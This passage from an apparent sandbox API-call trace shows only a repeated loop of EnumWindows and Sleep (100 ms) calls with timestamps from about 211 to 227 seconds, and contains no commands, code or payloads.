(dwMilliseconds=0x64) [0211.494] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0211.494] Sleep (dwMilliseconds=0x64) [0211.559] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0211.560] Sleep (dwMilliseconds=0x64) [0211.607] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0211.607] Sleep (dwMilliseconds=0x64) [0211.667] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0211.667] Sleep (dwMilliseconds=0x64) [0211.714] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0211.715] Sleep (dwMilliseconds=0x64) [0211.795] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0211.796] Sleep (dwMilliseconds=0x64) [0211.886] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0211.887] Sleep (dwMilliseconds=0x64) [0212.026] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0212.026] Sleep (dwMilliseconds=0x64) [0212.066] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0212.066] Sleep (dwMilliseconds=0x64) [0212.103] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0212.104] Sleep (dwMilliseconds=0x64) [0212.129] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0212.130] Sleep (dwMilliseconds=0x64) [0212.135] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0212.135] Sleep (dwMilliseconds=0x64) [0212.190] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0212.191] Sleep (dwMilliseconds=0x64) [0212.266] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0212.267] Sleep (dwMilliseconds=0x64) [0212.317] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0212.317] Sleep (dwMilliseconds=0x64) [0212.376] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0212.376] Sleep (dwMilliseconds=0x64) [0212.415] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0212.419] Sleep (dwMilliseconds=0x64) [0212.519] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0212.519] Sleep (dwMilliseconds=0x64) [0212.567] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0212.570] Sleep (dwMilliseconds=0x64) [0212.581] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0212.584] Sleep (dwMilliseconds=0x64) [0212.593] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0212.597] Sleep (dwMilliseconds=0x64) [0212.628] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0212.628] Sleep (dwMilliseconds=0x64) [0212.674] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0212.675] Sleep (dwMilliseconds=0x64) [0212.732] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0212.733] Sleep (dwMilliseconds=0x64) [0212.777] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0212.777] Sleep (dwMilliseconds=0x64) [0212.870] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0212.874] Sleep (dwMilliseconds=0x64) [0212.946] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0212.947] Sleep (dwMilliseconds=0x64) [0212.998] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0212.998] Sleep (dwMilliseconds=0x64) [0213.058] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0213.058] Sleep (dwMilliseconds=0x64) [0213.152] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0213.152] Sleep (dwMilliseconds=0x64) [0213.197] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0213.197] Sleep (dwMilliseconds=0x64) [0213.284] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0213.284] Sleep (dwMilliseconds=0x64) [0213.314] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0213.314] Sleep (dwMilliseconds=0x64) [0213.323] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0213.324] Sleep (dwMilliseconds=0x64) [0213.377] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0213.377] Sleep (dwMilliseconds=0x64) [0213.415] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0213.421] Sleep (dwMilliseconds=0x64) [0213.459] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0213.459] Sleep (dwMilliseconds=0x64) [0213.558] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0213.562] Sleep (dwMilliseconds=0x64) [0213.669] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0213.670] Sleep (dwMilliseconds=0x64) [0213.730] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0213.733] Sleep (dwMilliseconds=0x64) [0213.793] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0213.794] Sleep (dwMilliseconds=0x64) [0213.834] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0213.834] Sleep (dwMilliseconds=0x64) [0213.839] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0213.839] Sleep (dwMilliseconds=0x64) [0213.948] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0213.953] Sleep (dwMilliseconds=0x64) [0214.027] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0214.031] Sleep (dwMilliseconds=0x64) [0214.109] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0214.110] Sleep (dwMilliseconds=0x64) [0214.201] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0214.201] Sleep (dwMilliseconds=0x64) [0214.391] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0214.393] Sleep (dwMilliseconds=0x64) [0214.481] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0214.481] Sleep (dwMilliseconds=0x64) [0214.574] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0214.575] Sleep (dwMilliseconds=0x64) [0214.684] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0214.684] Sleep (dwMilliseconds=0x64) [0214.802] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0214.802] Sleep (dwMilliseconds=0x64) [0214.927] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0214.928] Sleep (dwMilliseconds=0x64) [0215.013] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0215.013] Sleep (dwMilliseconds=0x64) [0215.074] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0215.077] Sleep (dwMilliseconds=0x64) [0215.132] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0215.132] Sleep (dwMilliseconds=0x64) [0215.154] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0215.154] Sleep (dwMilliseconds=0x64) [0215.170] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0215.170] Sleep (dwMilliseconds=0x64) [0215.201] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0215.202] Sleep (dwMilliseconds=0x64) [0215.248] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0215.249] Sleep (dwMilliseconds=0x64) [0215.324] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0215.327] Sleep (dwMilliseconds=0x64) [0215.374] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0215.374] Sleep (dwMilliseconds=0x64) [0215.433] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0215.437] Sleep (dwMilliseconds=0x64) [0215.606] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0215.609] Sleep (dwMilliseconds=0x64) [0215.698] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0215.699] Sleep (dwMilliseconds=0x64) [0215.792] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0215.795] Sleep (dwMilliseconds=0x64) [0215.888] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0215.888] Sleep (dwMilliseconds=0x64) [0215.907] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0215.907] Sleep (dwMilliseconds=0x64) [0215.970] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0215.970] Sleep (dwMilliseconds=0x64) [0216.072] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0216.072] Sleep (dwMilliseconds=0x64) [0216.136] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0216.136] Sleep (dwMilliseconds=0x64) [0216.281] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0216.281] Sleep (dwMilliseconds=0x64) [0216.397] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0216.397] Sleep (dwMilliseconds=0x64) [0216.464] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0216.464] Sleep (dwMilliseconds=0x64) [0216.523] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0216.523] Sleep (dwMilliseconds=0x64) [0216.558] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0216.559] Sleep (dwMilliseconds=0x64) [0216.622] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0216.623] Sleep (dwMilliseconds=0x64) [0216.873] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0216.874] Sleep (dwMilliseconds=0x64) [0216.996] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0217.000] Sleep (dwMilliseconds=0x64) [0217.107] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0217.107] Sleep (dwMilliseconds=0x64) [0217.194] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0217.194] Sleep (dwMilliseconds=0x64) [0217.201] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0217.202] Sleep (dwMilliseconds=0x64) [0217.215] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0217.215] Sleep (dwMilliseconds=0x64) [0217.247] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0217.247] Sleep (dwMilliseconds=0x64) [0217.290] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0217.291] Sleep (dwMilliseconds=0x64) [0217.387] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0217.388] Sleep (dwMilliseconds=0x64) [0217.448] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0217.449] Sleep (dwMilliseconds=0x64) [0217.512] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0217.512] Sleep (dwMilliseconds=0x64) [0217.605] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0217.605] Sleep (dwMilliseconds=0x64) [0217.677] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0217.681] Sleep (dwMilliseconds=0x64) [0217.735] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0217.736] Sleep (dwMilliseconds=0x64) [0217.779] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0217.779] Sleep (dwMilliseconds=0x64) [0217.842] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0217.842] Sleep (dwMilliseconds=0x64) [0217.967] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0217.967] Sleep (dwMilliseconds=0x64) [0218.055] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0218.056] Sleep (dwMilliseconds=0x64) [0218.170] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0218.170] Sleep (dwMilliseconds=0x64) [0218.265] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0218.265] Sleep (dwMilliseconds=0x64) [0218.314] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0218.315] Sleep (dwMilliseconds=0x64) [0218.380] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0218.381] Sleep (dwMilliseconds=0x64) [0218.434] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0218.435] Sleep (dwMilliseconds=0x64) [0218.508] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0218.509] Sleep (dwMilliseconds=0x64) [0218.560] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0218.561] Sleep (dwMilliseconds=0x64) [0218.621] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0218.621] Sleep (dwMilliseconds=0x64) [0218.702] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0218.702] Sleep (dwMilliseconds=0x64) [0218.717] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0218.717] Sleep (dwMilliseconds=0x64) [0218.733] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0218.733] Sleep (dwMilliseconds=0x64) [0218.782] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0218.782] Sleep (dwMilliseconds=0x64) [0218.911] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0218.912] Sleep (dwMilliseconds=0x64) [0219.083] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0219.084] Sleep (dwMilliseconds=0x64) [0219.262] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0219.262] Sleep (dwMilliseconds=0x64) [0219.351] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0219.351] Sleep (dwMilliseconds=0x64) [0219.397] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0219.398] Sleep (dwMilliseconds=0x64) [0219.461] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0219.462] Sleep (dwMilliseconds=0x64) [0219.500] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0219.500] Sleep (dwMilliseconds=0x64) [0219.545] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0219.546] Sleep (dwMilliseconds=0x64) [0219.613] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0219.613] Sleep (dwMilliseconds=0x64) [0219.645] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0219.646] Sleep (dwMilliseconds=0x64) [0219.651] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0219.651] Sleep (dwMilliseconds=0x64) [0219.698] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0219.699] Sleep (dwMilliseconds=0x64) [0219.743] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0219.744] Sleep (dwMilliseconds=0x64) [0219.880] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0219.880] Sleep (dwMilliseconds=0x64) [0219.983] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0219.983] Sleep (dwMilliseconds=0x64) [0220.113] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0220.114] Sleep (dwMilliseconds=0x64) [0220.236] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0220.236] Sleep (dwMilliseconds=0x64) [0220.289] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0220.290] Sleep (dwMilliseconds=0x64) [0220.451] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0220.451] Sleep (dwMilliseconds=0x64) [0220.529] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0220.529] Sleep (dwMilliseconds=0x64) [0220.576] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0220.577] Sleep (dwMilliseconds=0x64) [0220.614] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0220.614] Sleep (dwMilliseconds=0x64) [0220.687] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0220.688] Sleep (dwMilliseconds=0x64) [0220.728] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0220.728] Sleep (dwMilliseconds=0x64) [0220.802] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0220.807] Sleep (dwMilliseconds=0x64) [0220.871] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0220.871] Sleep (dwMilliseconds=0x64) [0220.987] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0220.988] Sleep (dwMilliseconds=0x64) [0221.031] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0221.031] Sleep (dwMilliseconds=0x64) [0221.118] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0221.123] Sleep (dwMilliseconds=0x64) [0221.217] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0221.218] Sleep (dwMilliseconds=0x64) [0221.280] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0221.281] Sleep (dwMilliseconds=0x64) [0221.373] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0221.373] Sleep (dwMilliseconds=0x64) [0221.414] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0221.418] Sleep (dwMilliseconds=0x64) [0221.556] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0221.557] Sleep (dwMilliseconds=0x64) [0221.597] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0221.597] Sleep (dwMilliseconds=0x64) [0221.675] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0221.675] Sleep (dwMilliseconds=0x64) [0221.722] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0221.723] Sleep (dwMilliseconds=0x64) [0221.774] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0221.775] Sleep (dwMilliseconds=0x64) [0221.831] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0221.832] Sleep (dwMilliseconds=0x64) [0221.877] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0221.878] Sleep (dwMilliseconds=0x64) [0221.951] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0221.952] Sleep (dwMilliseconds=0x64) [0222.043] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0222.044] Sleep (dwMilliseconds=0x64) [0222.114] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0222.115] Sleep (dwMilliseconds=0x64) [0222.166] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0222.170] Sleep (dwMilliseconds=0x64) [0222.199] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0222.202] Sleep (dwMilliseconds=0x64) [0222.248] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0222.248] Sleep (dwMilliseconds=0x64) [0222.279] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0222.279] Sleep (dwMilliseconds=0x64) [0222.294] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0222.295] Sleep (dwMilliseconds=0x64) [0222.389] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0222.389] Sleep (dwMilliseconds=0x64) [0222.471] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0222.471] Sleep (dwMilliseconds=0x64) [0222.514] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0222.514] Sleep (dwMilliseconds=0x64) [0222.574] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0222.577] Sleep (dwMilliseconds=0x64) [0222.677] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0222.678] Sleep (dwMilliseconds=0x64) [0222.718] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0222.719] Sleep (dwMilliseconds=0x64) [0222.732] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0222.733] Sleep (dwMilliseconds=0x64) [0222.750] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0222.750] Sleep (dwMilliseconds=0x64) [0222.794] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0222.795] Sleep (dwMilliseconds=0x64) [0222.864] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0222.864] Sleep (dwMilliseconds=0x64) [0222.921] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0222.922] Sleep (dwMilliseconds=0x64) [0222.999] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0223.000] Sleep (dwMilliseconds=0x64) [0223.092] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0223.092] Sleep (dwMilliseconds=0x64) [0223.170] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0223.170] Sleep (dwMilliseconds=0x64) [0223.215] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0223.216] Sleep (dwMilliseconds=0x64) [0223.263] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0223.264] Sleep (dwMilliseconds=0x64) [0223.302] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0223.302] Sleep (dwMilliseconds=0x64) [0223.307] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0223.308] Sleep (dwMilliseconds=0x64) [0223.370] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0223.371] Sleep (dwMilliseconds=0x64) [0223.477] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0223.478] Sleep (dwMilliseconds=0x64) [0223.573] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0223.574] Sleep (dwMilliseconds=0x64) [0223.671] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0223.671] Sleep (dwMilliseconds=0x64) [0224.059] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0224.059] Sleep (dwMilliseconds=0x64) [0224.200] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0224.201] Sleep (dwMilliseconds=0x64) [0224.370] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0224.372] Sleep (dwMilliseconds=0x64) [0224.430] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0224.431] Sleep (dwMilliseconds=0x64) [0224.442] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0224.442] Sleep (dwMilliseconds=0x64) [0224.511] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0224.512] Sleep (dwMilliseconds=0x64) [0224.606] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0224.606] Sleep (dwMilliseconds=0x64) [0224.667] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0224.668] Sleep (dwMilliseconds=0x64) [0224.761] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0224.761] Sleep (dwMilliseconds=0x64) [0224.802] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0224.802] Sleep (dwMilliseconds=0x64) [0224.840] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0224.840] Sleep (dwMilliseconds=0x64) [0224.867] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0224.867] Sleep (dwMilliseconds=0x64) [0224.870] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0224.870] Sleep (dwMilliseconds=0x64) [0224.887] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0224.887] Sleep (dwMilliseconds=0x64) [0224.932] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0224.933] Sleep (dwMilliseconds=0x64) [0224.983] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0224.983] Sleep (dwMilliseconds=0x64) [0225.027] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0225.027] Sleep (dwMilliseconds=0x64) [0225.167] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0225.168] Sleep (dwMilliseconds=0x64) [0225.248] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0225.249] Sleep (dwMilliseconds=0x64) [0225.302] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0225.302] Sleep (dwMilliseconds=0x64) [0225.339] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0225.339] Sleep (dwMilliseconds=0x64) [0225.354] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0225.355] Sleep (dwMilliseconds=0x64) [0225.370] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0225.374] Sleep (dwMilliseconds=0x64) [0225.419] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0225.420] Sleep (dwMilliseconds=0x64) [0225.493] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0225.494] Sleep (dwMilliseconds=0x64) [0225.554] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0225.555] Sleep (dwMilliseconds=0x64) [0225.654] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0225.655] Sleep (dwMilliseconds=0x64) [0225.716] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0225.716] Sleep (dwMilliseconds=0x64) [0225.778] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0225.778] Sleep (dwMilliseconds=0x64) [0225.803] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0225.803] Sleep (dwMilliseconds=0x64) [0225.807] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0225.807] Sleep (dwMilliseconds=0x64) [0225.823] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0225.823] Sleep (dwMilliseconds=0x64) [0225.874] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0225.875] Sleep (dwMilliseconds=0x64) [0225.920] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0225.920] Sleep (dwMilliseconds=0x64) [0226.014] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0226.014] Sleep (dwMilliseconds=0x64) [0226.065] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0226.065] Sleep (dwMilliseconds=0x64) [0226.120] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0226.120] Sleep (dwMilliseconds=0x64) [0226.214] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0226.214] Sleep (dwMilliseconds=0x64) [0226.384] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0226.387] Sleep (dwMilliseconds=0x64) [0226.466] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0226.466] Sleep (dwMilliseconds=0x64) [0226.487] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0226.487] Sleep (dwMilliseconds=0x64) [0226.495] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0226.495] Sleep (dwMilliseconds=0x64) [0226.592] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0226.592] Sleep (dwMilliseconds=0x64) [0226.683] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0226.687] Sleep (dwMilliseconds=0x64) [0226.747] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0226.747] Sleep (dwMilliseconds=0x64) [0226.809] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0226.809] Sleep (dwMilliseconds=0x64) [0226.892] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0226.892] Sleep (dwMilliseconds=0x64) [0226.906] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0226.907] Sleep (dwMilliseconds=0x64) [0226.929] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0226.930] Sleep (dwMilliseconds=0x64) [0226.966] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0226.966] Sleep (dwMilliseconds=0x64) [0227.025] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0227.025] Sleep (dwMilliseconds=0x64) [0227.093] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0227.093] Sleep (dwMilliseconds=0x64) [0227.167] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0227.168] Sleep (dwMilliseconds=0x64) [0227.234] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0227.234] Sleep (dwMilliseconds=0x64) [0227.277] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0227.280] Sleep (dwMilliseconds=0x64) [0227.330] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0227.331] Sleep (dwMilliseconds=0x64) [0227.372] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0227.373] Sleep (dwMilliseconds=0x64) [0227.392] 